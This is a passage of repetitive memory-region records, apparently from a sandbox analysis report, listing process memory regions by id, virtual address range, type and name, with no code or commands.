"pagefile_0x00000000002a0000" filename = "" Region: id = 12098 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12249 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12250 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12251 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12252 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12253 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12254 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12255 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12256 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12257 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12258 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12259 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12260 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12261 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12262 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12263 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12264 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12265 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12266 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12267 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12268 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12269 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12270 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12271 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12272 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12273 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12274 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12275 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12276 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12277 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12278 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12279 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12280 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12281 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12282 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12283 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12284 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12285 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12286 start_va 
= 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12287 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12288 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12289 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12290 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12291 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12292 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12293 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12294 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12354 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12355 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12356 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12357 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 12358 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12359 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12361 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12362 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12363 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12364 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12365 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12366 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12367 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12368 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12369 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12370 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 12371 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12372 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12373 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12374 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12375 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12376 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12377 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12378 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12379 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12380 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12381 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12382 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12383 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12384 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12385 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12386 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12387 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12388 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12389 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12390 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12391 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12392 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12393 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12394 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12395 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12396 start_va = 0x2a0000 end_va 
= 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12397 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12398 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12399 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12400 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12401 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12402 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12403 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12404 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12405 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12406 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12407 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12408 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
12409 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12410 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12411 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12412 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12413 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12593 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12594 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12595 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12596 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12597 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12598 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12599 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12600 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 12601 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12602 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12603 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12604 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12605 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12606 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12607 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12608 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12611 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12612 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12613 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 12614 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12615 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12616 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12617 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12618 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12619 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12620 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12621 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12622 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12623 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12624 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12625 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12626 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12627 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12628 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12629 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12630 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12631 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12632 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12633 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12634 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12635 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12636 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12637 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12638 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12639 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12640 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12647 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12651 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12652 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12653 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12654 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12658 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12661 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 12671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12673 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12674 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12675 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12676 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12679 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12680 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12681 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
